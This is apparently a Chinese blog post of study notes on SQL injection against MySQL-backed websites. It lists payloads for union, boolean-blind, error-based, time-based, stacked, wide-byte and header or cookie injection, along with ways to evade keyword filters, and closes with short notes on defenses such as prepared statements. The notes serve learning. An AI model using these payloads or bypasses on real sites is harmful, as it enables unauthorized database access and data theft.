学习笔记(六)SQL注入

最新推荐文章于 2024-07-08 17:54:51 发布
最新推荐文章于 2024-07-08 17:54:51 发布
阅读量184 收藏
点赞数
文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MR_SJ/article/details/116755601
版权

1.SQL注入:

#1 sql注入原理:前端构造参数拼接到sql语句查询数据库;
启示开发者:外部参数皆不可信
#2 mysql相关:Mysql5.0版本后,有默认数据库information_schema
里面包含SCHEMATA(储存所有数据库库名,字段名是schema_name)
TABLES(所有数据库库名和表名,字段名分别是table_schema,table_name)
COLUMNS(所有库名表名字段名,table_schema,table_name,column_name)
#3 limit:limit m,n eg:limit 0,1 从第一条开始的一条记录
#4 函数:database()、version()、user()
#5 注释符:#、–空格、/**/(地址栏用–+、%23)
#6 内联注释
#7 union注入
用burp比较每次注入返回信息
在burp请求页时,+代表空格
#8 布尔盲注
先判断库名长度:length(database())>=1 --+;
逐字判断数据库名:
substr(database(),1,1)=‘t’ --+ //用字符
ord(Substr(database(),1,1))=115 --+ //用ascii码
用burp爆破;
表名和字段名也是逐字判断:
substr((select table_name from informaton_schema.tables where table_name=’database()’ limit 0,1),1,1)=’e’ --+
#9 报错注入
利用updatexml()函数获取user():
and updatexml(1,concat(0x7e,(select user()),0x7e),1)- - +;
数据库名:and updatexml(1,concat(0x7e,(select database()),0x7e),1)- - +;
表名:updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) --+;
#10 时间注入:时间盲注
If(expr1,expr2,expr3)//1对返回2,否则3
If (length(database())>1,sleep(5),1)//观察burp返回时间判断是否正确
查询数据库:if(substr(database(),1,1)=’s’,sleep(5),1)
#11 堆叠查询注入:查询多条语句
‘;select if(substr(user(),1,1)=’r’,sleep(3),1)%23//分号是灵魂
#12 二次注入:在相关网址注册用户test’,生成id,再输入id间接注入
#13 宽字节注入:
参数被反斜杠单引号包围时,id 无法逃逸,当数据库编码为gbk格式
用%df,因为反斜杠是%5c,%df%5c编码为字“连”,参数可逃逸,再结合union注入;
嵌套查询,单引号被转译,可以用(select database())表示’sql’;
#14 cookie注入:
url没有id参数,cookie中有id参数,修改cookie注入
#15 base64编码注入:
Url 中的id参数经过base64编码
#16 XFF注入:
http请求头中有一个头部参数x-forwarded-for,修改值可以伪造客户端ip
ip即为注入点

2.SQL注入绕过技术:

#1 大小写绕过:当出现no hack考虑拦截
改变关键词的大小写绕过,因为本身sql语句大小写不敏感;
#2 双写绕过:有拦截关键词的情况
Eg: and 会被绕过,写成anandd
#3 编码绕过:有拦截关键词的情况
服务器会自动对url解码一次,因此关键词要URL全编码两次
#4 内联注释绕过:
and 写成/!and/

3.SQL注入防护手段

#1 过滤危险字符:
普通查询语句,过滤掉特殊语法;
老版本mysql不支持union,要检查;
程序里基本不含–+或#这样的注释;
sleep()函数不会被使用;
老版本不支持子查询;
#2 使用预编译语句:不直接将变量拼接到PDO语句中,用占位符

今夜取你狗命
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入练习之bool盲注
windStudyer的专栏
05-22 1133
1.bool盲注的原理 以根据返回页面判断条件真假的注入 判断方式: 通过长度判断 length(): length(database())>=x 通过字符判断 substr():substr(database() ,1,1)= 's' 通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x 2.bool盲注相关的函数 3.实验-bool盲注 实验环境:phpstudy+apache+mysql+pikachu 3.1判断注入点
SQL学习笔记(06)_SELECT INTO
weixin_44216392的博客
03-22 232
曾经沧海难为水,除却巫山不是云。 取次花丛懒回顾,半缘修道半缘君。 离思五首·其四 原创作者:是飘飘呀! 博客地址:https://blog.csdn.net/weixin_44216392 SELECT INTO 语句 SELECT INTO 语句从一个表复制数据,然后把数据插入到另一个新表中。通过此SQL,可以从一个表复制信息到另一个表。 SELECT INTO的语法 -- 直接复制所有的列插入到新表中 SELECT * INTO newtable [IN externaldb] FROM tabl
墨者 - SQL注入漏洞测试(报错盲注)
吃肉唐僧的博客
07-07 2676
根据题意,用updatexml构造报错回显' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ 爆库 ' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ 爆表' and updatexml(1,concat(0x7e,(select table_n...
SQL注入----报错注入简介(updatexml
一只web狗
06-21 3377
报错注入(updatexml)常用语句
SQL注入(一)
小袁的博客
06-14 186
sql注入篇 基本的有: 1、Union注入:先用常规的测试方法 and 1=1 、and 1=2 探测是否存在注入;然后order by x 探测回显位置;最后select语句查找需要的信息 2、Boolean注入:页面只会回显yes或者no (1) 确定存在注入之后用and length(database())>=x探测数据库字段长度; ...
安全技能-常见sql注入
UHGsec——palink博客
10-14 168
时间盲注 URL地址:http://127.0.0.1/sql/lime.php?id=1 情况与Boolean注入相似的另外一种注入方式 时间盲注多与if(expr1,expr2,expr3)结合使用 if含义是:如果expr1位TRUE,则返回expr2,否则返回expr3 判断数据库名长度 if(length(database())>1,sleep(5),1) ...
字符串截取
qq_42129143的博客
05-22 273
1、slice() 第一个参数是开始位置,第二个参数是结束位置的后一位,截取出来的字符串长度是第二个参数和第一个参数的差, 如果参数是负数,则将该值加上字符串长度转为正值,如果第一个参数大于第二个参数,返回空字符串2、substring 第一个参数是开始位置,第二个参数是结束位置的后一位,截取出来的字符串长度是第二个参数与第一个参数的差 如果参数是负数,则将该值转换...
SQL学习笔记(五)
weixin_44013591的博客
03-15 210
SQL语言对数据库的操作不同且结合数据库管理系统,以及SQL语言大致分类,本文将结合实际操作重点数据库定义语言详细知识点的 一、 1.SQL语句中update 与 alter的用法: (1)update用于对数据库中数据的操作; (2)alert用于对表和库的基本架构进行更改; 2. ...
SQL注入手工笔记.txt
11-29
SQL手工注入小结笔记,大家都来学习学习
SQL注入笔记
02-07
SQL注入笔记 对于新手学习SQL注入很有帮助 欢迎大家查看
PHPSQL注入漏洞学习
01-21
SQL注入是攻击者通过输入恶意的SQL代码,欺骗数据库服务器执行非预期的操作,从而获取、修改、删除或添加数据的一种方法。在PHP环境中,由于不安全的用户输入处理,这种漏洞尤为突出。 二、PHP SQL注入的类型 1. ...
sql注入笔记
03-15
SQL 注入笔记 SQL 注入是一种常见的 Web 应用程序漏洞,攻击者可以通过inject恶意 SQL 代码来访问、修改或控制数据库中的数据。本文将详细介绍 SQL 注入的基本概念、检测方法和防御策略。 什么是 SQL 注入? SQL ...
MyBatis-Plus 学习笔记.pdf
08-30
MyBatis-Plus 学习笔记 MyBatis-Plus 是一个基于 MyBatis 的增强工具,旨在简化开发、提高效率。它提供了许多实用的特性和功能,例如无侵入、损耗小、强大的 CRUD 操作、支持 Lambda 形式调用、支持多种数据库、...
十种MySQL报错注入
BAM9090的博客
09-28 552
以下均摘自《代码审计:企业级Web代码安全架构》一书 1.floor() select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2.extrac...
堆叠查询注入攻击之结构理论
weixin_46163639的博客
05-24 235
堆叠查询注入介绍 Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真 实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。 这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下 一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injecti
布尔盲注
m0_52880296的博客
05-06 4036
一.布尔盲注原理: 布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false, 构造SQL语句, 利用and,or等关键字来其后的语句 true 、 false使web页面返回true或者false, 从而达到注入的目的来获取信息的一种方法 没有错误提示 也没有回显 但是输入错误的话页面会有反应 也就是说 只有 true 和false 例如 :sql-labs /less-7 它只有两种提示 所以可以用布尔盲注 playload:and length(databas
sql盲注特点_sql盲注讲解
weixin_39838798的博客
12-24 306
盲注有时候,开发人员不会把数据库报错信息显示在前端页面,这样就使我们想要通过union注入或报错注入的攻击方式难以实现。当不显示报错信息的时候,我们还可以通过盲注的方式来对数据库进行注入攻击。盲注,顾名思义,就是在页面没有提供明显信息的情况执行的注入方式。盲注又分为两种,布尔型盲注和时间型盲注。布尔型盲注,以sqli-lab第8关为例:1、输入id=1正常显示,输入id=123456显示与正常不同...
SQL性能优化策略
最新发布
modelsetget的博客
07-08 487
你不得不知的SQL调优策略笔记
sqli-labs靶场练习笔记
11-09
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值